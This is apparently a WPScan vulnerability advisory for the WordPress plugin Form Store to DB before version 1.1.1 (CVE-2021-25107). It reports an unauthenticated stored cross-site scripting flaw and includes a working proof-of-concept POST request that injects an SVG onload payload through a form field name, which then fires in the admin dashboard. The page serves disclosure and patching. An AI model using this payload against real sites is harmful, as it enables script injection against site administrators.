WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact
WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Form Store to DB < 1.1.1 - Unauthenticated Stored Cross-Site Scripting

Description

The plugin does not sanitise and escape parameter keys before outputting it back in the created entry, allowing unauthenticated attacker to perform Cross-Site Scripting attacks against admin

Proof of Concept

POST /wp-json/contact-form-7/v1/contact-forms/1337/feedback HTTP/2
Content-Type: multipart/form-data; boundary=---------------------------243715402120191890871051639470

-----------------------------243715402120191890871051639470
Content-Disposition: form-data; name="your-name"

Attacker
-----------------------------243715402120191890871051639470
Content-Disposition: form-data; name="your-email"

[email protected]
-----------------------------243715402120191890871051639470
Content-Disposition: form-data; name="your-subject"

XSS Injection
-----------------------------243715402120191890871051639470
Content-Disposition: form-data; name="your-message"

Sorry, not sorry.
-----------------------------243715402120191890871051639470
Content-Disposition: form-data; name="AA<svg/onload=(alert)(/XSS/)>"

Injected
-----------------------------243715402120191890871051639470--


The XSS will be triggered when viewing the related Entry in the admin dashboard (/wp-admin/edit.php?post_type=cf7storetodbs) 

Affects Plugins

cf7-store-to-db-lite
Fixed in version 1.1.1

References

CVE
CVE-2021-25107
URL
https://plugins.trac.wordpress.org/changeset/2657583

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

Yoru Oni

Submitter

Yoru Oni

Submitter website
https://profiles.wordpress.org/yoruoni
Verified

Yes

WPVDB ID
3999a1b9-df85-43b1-b412-dc8a6f71cc5d

Timeline

Publicly Published

2022-01-17 (about 5 months ago)

Added

2022-01-17 (about 5 months ago)

Last Updated

2022-04-12 (about 2 months ago)

Our Other Services

WPScan WordPress Security Plugin
WPScan

Vulnerabilities

WordPressPluginsThemesOur StatsSubmit vulnerabilities

About

How it worksPricingWordPress pluginNewsContact

For Developers

StatusAPI detailsCLI scanner

Other

PrivacyTerms of serviceDisclosure policy
jetpackIn partnership with Jetpack
githubtwitterfacebook
Angithubendeavor
Work With Us